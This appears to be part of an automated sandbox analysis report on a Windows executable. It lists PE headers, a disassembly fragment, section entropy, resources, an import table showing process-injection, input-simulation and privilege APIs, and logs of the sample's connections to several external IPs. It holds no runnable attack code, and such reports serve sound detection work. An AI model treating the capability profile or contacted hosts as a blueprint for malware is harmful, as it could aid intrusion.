                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x67471D02 [Wed Nov 27 13:22:10 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                              Instruction
                                              call 00007FFBC47F290Fh
                                              jmp 00007FFBC47E5924h
                                              int3
                                              int3
                                              push edi
                                              push esi
                                              mov esi, dword ptr [esp+10h]
                                              mov ecx, dword ptr [esp+14h]
                                              mov edi, dword ptr [esp+0Ch]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007FFBC47E5AAAh
                                              cmp edi, eax
                                              jc 00007FFBC47E5E0Eh
                                              bt dword ptr [004C0158h], 01h
                                              jnc 00007FFBC47E5AA9h
                                              rep movsb
                                              jmp 00007FFBC47E5DBCh
                                              cmp ecx, 00000080h
                                              jc 00007FFBC47E5C74h
                                              mov eax, edi
                                              xor eax, esi
                                              test eax, 0000000Fh
                                              jne 00007FFBC47E5AB0h
                                              bt dword ptr [004BA370h], 01h
                                              jc 00007FFBC47E5F80h
                                              bt dword ptr [004C0158h], 00000000h
                                              jnc 00007FFBC47E5C4Dh
                                              test edi, 00000003h
                                              jne 00007FFBC47E5C5Eh
                                              test esi, 00000003h
                                              jne 00007FFBC47E5C3Dh
                                              bt edi, 02h
                                              jnc 00007FFBC47E5AAFh
                                              mov eax, dword ptr [esi]
                                              sub ecx, 04h
                                              lea esi, dword ptr [esi+04h]
                                              mov dword ptr [edi], eax
                                              lea edi, dword ptr [edi+04h]
                                              bt edi, 03h
                                              jnc 00007FFBC47E5AB3h
                                              movq xmm1, qword ptr [esi]
                                              sub ecx, 08h
                                              lea esi, dword ptr [esi+08h]
                                              movq qword ptr [edi], xmm1
                                              lea edi, dword ptr [edi+08h]
                                              test esi, 00000007h
                                              je 00007FFBC47E5B05h
                                              bt esi, 03h
                                              jnc 00007FFBC47E5B58h
                                              movdqa xmm1, dqword ptr [esi+00h]
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2012 UPD4 build 61030
                                              • [RES] VS2012 UPD4 build 61030
                                              • [LNK] VS2012 UPD4 build 61030
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x601f8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x6c4c.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0xc40000x601f80x60200e5cf1c570df2c9ab7eba8aa8160a33a0False0.9321993863784135data7.902665603290473IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x1250000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                              RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                              RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                              RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                              RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                              RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                              RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                              RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                              RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                              RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                              RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                              RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                              RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                              RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                              RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                              RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                              RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                              RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                              RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                              RT_RCDATA0xcc7b80x574fddata1.0003243584832326
                                              RT_GROUP_ICON0x123cb80x76dataEnglishGreat Britain0.6610169491525424
                                              RT_GROUP_ICON0x123d300x14dataEnglishGreat Britain1.25
                                              RT_GROUP_ICON0x123d440x14dataEnglishGreat Britain1.15
                                              RT_GROUP_ICON0x123d580x14dataEnglishGreat Britain1.25
                                              RT_VERSION0x123d6c0xdcdataEnglishGreat Britain0.6181818181818182
                                              RT_MANIFEST0x123e480x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                              DLLImport
                                              WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                              PSAPI.DLLGetProcessMemoryInfo
                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                              USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                              UxTheme.dllIsThemeActive
                                              KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                              GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                              ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                              OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishGreat Britain
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 5, 2024 18:35:58.277952909 CET4982380192.168.2.63.33.130.190
                                              Dec 5, 2024 18:35:58.397711992 CET80498233.33.130.190192.168.2.6
                                              Dec 5, 2024 18:35:58.397789955 CET4982380192.168.2.63.33.130.190
                                              Dec 5, 2024 18:35:58.405879974 CET4982380192.168.2.63.33.130.190
                                              Dec 5, 2024 18:35:58.525731087 CET80498233.33.130.190192.168.2.6
                                              Dec 5, 2024 18:35:59.499165058 CET80498233.33.130.190192.168.2.6
                                              Dec 5, 2024 18:35:59.499537945 CET80498233.33.130.190192.168.2.6
                                              Dec 5, 2024 18:35:59.499591112 CET4982380192.168.2.63.33.130.190
                                              Dec 5, 2024 18:35:59.502739906 CET4982380192.168.2.63.33.130.190
                                              Dec 5, 2024 18:35:59.622668028 CET80498233.33.130.190192.168.2.6
                                              Dec 5, 2024 18:36:23.192763090 CET4988180192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:23.312613964 CET804988138.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:23.312719107 CET4988180192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:23.322952986 CET4988180192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:23.442878008 CET804988138.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:24.824188948 CET4988180192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:24.856092930 CET804988138.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:24.856195927 CET4988180192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:24.856239080 CET804988138.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:24.856292963 CET4988180192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:24.943906069 CET804988138.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:24.944009066 CET4988180192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:25.843581915 CET4989080192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:25.963844061 CET804989038.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:25.964000940 CET4989080192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:25.974590063 CET4989080192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:26.094554901 CET804989038.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:27.480379105 CET4989080192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:27.504143953 CET804989038.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:27.504184008 CET804989038.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:27.504206896 CET4989080192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:27.504226923 CET4989080192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:27.606865883 CET804989038.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:27.606930017 CET4989080192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:28.499253035 CET4989780192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:28.619584084 CET804989738.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:28.619687080 CET4989780192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:28.630124092 CET4989780192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:28.749910116 CET804989738.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:28.750190020 CET804989738.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:30.136773109 CET4989780192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:30.302459955 CET804989738.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:31.155297995 CET4990380192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:31.275141954 CET804990338.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:31.275259972 CET4990380192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:31.282665014 CET4990380192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:31.402508020 CET804990338.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:32.753664970 CET804989738.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:32.753741980 CET4989780192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:34.005141020 CET804990338.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:34.005223036 CET804990338.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:34.005454063 CET4990380192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:34.007983923 CET4990380192.168.2.638.47.232.196
                                              Dec 5, 2024 18:36:34.127684116 CET804990338.47.232.196192.168.2.6
                                              Dec 5, 2024 18:36:39.801927090 CET4992380192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:39.921741009 CET8049923217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:39.921842098 CET4992380192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:39.932117939 CET4992380192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:40.051939964 CET8049923217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:41.294272900 CET8049923217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:41.294353962 CET8049923217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:41.294418097 CET4992380192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:41.433530092 CET4992380192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:42.452112913 CET4992980192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:42.571835041 CET8049929217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:42.575140953 CET4992980192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:42.585923910 CET4992980192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:42.705734015 CET8049929217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:43.922816038 CET8049929217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:43.922835112 CET8049929217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:43.922936916 CET4992980192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:44.089934111 CET4992980192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:45.108407021 CET4993680192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:45.228571892 CET8049936217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:45.228671074 CET4993680192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:45.241411924 CET4993680192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:45.363717079 CET8049936217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:45.363735914 CET8049936217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:46.631375074 CET8049936217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:46.631704092 CET8049936217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:46.631804943 CET4993680192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:46.746187925 CET4993680192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:47.764738083 CET4994280192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:47.885075092 CET8049942217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:47.885397911 CET4994280192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:47.892755032 CET4994280192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:48.015249014 CET8049942217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:49.221368074 CET8049942217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:49.221386909 CET8049942217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:49.221518040 CET4994280192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:49.221549988 CET8049942217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:49.221595049 CET4994280192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:49.224221945 CET4994280192.168.2.6217.160.0.207
                                              Dec 5, 2024 18:36:49.344717026 CET8049942217.160.0.207192.168.2.6
                                              Dec 5, 2024 18:36:54.867317915 CET4995880192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:54.987318993 CET804995854.67.87.110192.168.2.6
                                              Dec 5, 2024 18:36:54.987417936 CET4995880192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:54.999003887 CET4995880192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:55.118804932 CET804995854.67.87.110192.168.2.6
                                              Dec 5, 2024 18:36:56.224602938 CET804995854.67.87.110192.168.2.6
                                              Dec 5, 2024 18:36:56.225033045 CET804995854.67.87.110192.168.2.6
                                              Dec 5, 2024 18:36:56.225085974 CET4995880192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:56.511862040 CET4995880192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:57.530462027 CET4996680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:57.650365114 CET804996654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:36:57.650460005 CET4996680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:57.663726091 CET4996680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:57.783744097 CET804996654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:36:58.904553890 CET804996654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:36:58.904591084 CET804996654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:36:58.904644012 CET4996680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:36:59.171103001 CET4996680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:00.186903000 CET4997680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:00.380285025 CET804997654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:00.380430937 CET4997680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:00.392107964 CET4997680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:00.511861086 CET804997654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:00.511991024 CET804997654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:01.608062983 CET804997654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:01.608140945 CET804997654.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:01.608227015 CET4997680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:01.902430058 CET4997680192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:02.921602964 CET4998280192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:03.041482925 CET804998254.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:03.047142029 CET4998280192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:03.051117897 CET4998280192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:03.171001911 CET804998254.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:04.275090933 CET804998254.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:04.275212049 CET804998254.67.87.110192.168.2.6
                                              Dec 5, 2024 18:37:04.275269032 CET4998280192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:04.278493881 CET4998280192.168.2.654.67.87.110
                                              Dec 5, 2024 18:37:04.398210049 CET804998254.67.87.110192.168.2.6
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 5, 2024 18:35:57.875217915 CET6429053192.168.2.61.1.1.1
                                              Dec 5, 2024 18:35:58.269004107 CET53642901.1.1.1192.168.2.6
                                              Dec 5, 2024 18:36:14.546921015 CET5714553192.168.2.61.1.1.1
                                              Dec 5, 2024 18:36:14.779361010 CET53571451.1.1.1192.168.2.6
                                              Dec 5, 2024 18:36:22.859390974 CET6482853192.168.2.61.1.1.1
                                              Dec 5, 2024 18:36:23.189790010 CET53648281.1.1.1192.168.2.6
                                              Dec 5, 2024 18:36:39.015430927 CET5527553192.168.2.61.1.1.1
                                              Dec 5, 2024 18:36:39.798567057 CET53552751.1.1.1192.168.2.6
                                              Dec 5, 2024 18:36:54.239870071 CET6131953192.168.2.61.1.1.1
                                              Dec 5, 2024 18:36:54.864787102 CET53613191.1.1.1192.168.2.6
                                              Dec 5, 2024 18:37:09.937289953 CET5102153192.168.2.61.1.1.1
                                              Dec 5, 2024 18:37:10.949261904 CET5102153192.168.2.61.1.1.1
